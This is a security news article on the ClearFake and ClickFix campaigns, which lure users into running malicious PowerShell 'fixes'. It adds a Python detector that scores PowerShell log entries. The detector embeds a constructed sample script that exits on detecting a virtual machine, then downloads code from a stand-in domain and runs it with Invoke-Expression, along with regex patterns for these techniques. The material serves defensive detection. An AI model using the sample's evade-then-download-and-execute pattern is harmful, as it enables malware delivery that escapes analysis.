
Beware PowerShell: Too-helpful users tricked into ‘fixing’ their machines with malware

However, to evade detection, the scripts first checked whether they were running inside a virtual machine or sandbox (a common way for researchers to vet suspicious sites without compromising their own machines); if a VM or sandbox was detected, the script exited without performing any malicious activity.

ClickFix

Another threat actor popped up a message saying something had gone wrong while displaying a web page, and (surprise!) the user should copy the code for a fix and run it in PowerShell. As with ClearFake, it provided clear instructions on how to “patch” the system. Proofpoint said that this campaign lasted only a few days before becoming inactive, and a few days later it was replaced by the ClearFake injection. “As the pley[.]es domain itself seems to be compromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or if the ClearFake actor re-compromised the iframe, replacing the code with its own content,” Proofpoint said in its blog post. Regardless, the ClearFake compromise remains active on sites originally infected with ClickFix.
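Both campaigns end with the user pasting a script into PowerShell, and the script then checks for a VM or sandbox before doing anything else, so the most useful place to look for them is PowerShell script-block logging (event 4104 in Microsoft-Windows-PowerShell/Operational). The following triage routine is an added example, not code from the article or from Proofpoint: it scores the text of logged script blocks for the combination of sandbox-evasion checks, early `exit`, remote fetch and dynamic execution. The two sample script blocks, the indicator list, the weights and the alert threshold are all constructed for illustration and are not the actual ClearFake or ClickFix payloads.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample script blocks, shaped like the ScriptBlockText field of
# PowerShell event 4104. Made up for this example; not real campaign code.
SAMPLE_SCRIPT_BLOCKS: dict[str, str] = {
    # Ordinary admin inventory script: should not alert.
    "admin-inventory": """
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version
Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv
""",
    # Pasted "fix": bails out on VM/sandbox artifacts, then fetches and
    # evaluates remote code. The domain uses the reserved .invalid TLD.
    "pasted-fix": """
$m = (Get-CimInstance Win32_ComputerSystem).Model
if ($m -match 'VMware|VirtualBox|Virtual Machine|QEMU|HVM') { exit }
if (Get-Process -Name vmtoolsd,vboxservice -ErrorAction SilentlyContinue) { exit }
$s = (New-Object Net.WebClient).DownloadString('https://update.example.invalid/fix.txt')
Invoke-Expression $s
""",
}


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: re.Pattern[str]
    weight: int


# Assumed indicator set. Each one alone is weak (admins query hardware and
# download files too); the alert fires on the combination.
INDICATORS: list[Indicator] = [
    Indicator("vm-artifact-strings",
              re.compile(r"VMware|VirtualBox|VBox|QEMU|Xen|Hyper-?V|vmtoolsd|vboxservice", re.I), 2),
    Indicator("hardware-query",
              re.compile(r"Win32_ComputerSystem|Win32_BIOS|Win32_VideoController", re.I), 1),
    # `if (...) { exit }`: terminate silently when the environment looks analysed.
    Indicator("exit-on-detect",
              re.compile(r"if\s*\(.*?\)\s*\{\s*exit\s*\}", re.I), 2),
    Indicator("remote-fetch",
              re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|Net\.WebClient", re.I), 1),
    Indicator("dynamic-exec",
              re.compile(r"Invoke-Expression|\biex\b", re.I), 2),
]

ALERT_THRESHOLD = 5  # assumed tuning value; baseline it against your own fleet


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Return (total weight, names of matched indicators) for one script block."""
    hits = [ind for ind in INDICATORS if ind.pattern.search(text)]
    return sum(ind.weight for ind in hits), [ind.name for ind in hits]


def triage(blocks: dict[str, str]) -> dict[str, dict]:
    """Score every block and mark those at or above ALERT_THRESHOLD."""
    results = {}
    for name, text in blocks.items():
        score, hits = score_script_block(text)
        results[name] = {"score": score, "hits": hits, "alert": score >= ALERT_THRESHOLD}
    return results


if __name__ == "__main__":
    for name, r in triage(SAMPLE_SCRIPT_BLOCKS).items():
        flag = "ALERT" if r["alert"] else "ok"
        print(f"{name:16s} {flag:5s} score={r['score']} hits={r['hits']}")
```

In production the block text would come from `Get-WinEvent` or a SIEM export rather than an inline dictionary; the scoring is deliberately additive so that an admin script that only queries `Win32_ComputerSystem`, or only downloads a file, stays below the threshold while the evade-then-fetch-then-eval sequence the article describes does not.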

“The lures are effective,” said David Shipley, CEO and cofounder of Beauceron Security, “because they’re aimed at helping people, use language regular folks see but don’t understand (certificates) and look close enough to real dialogue buttons that if you’re busy, inexperienced, or feeling frustrated, look real enough.”
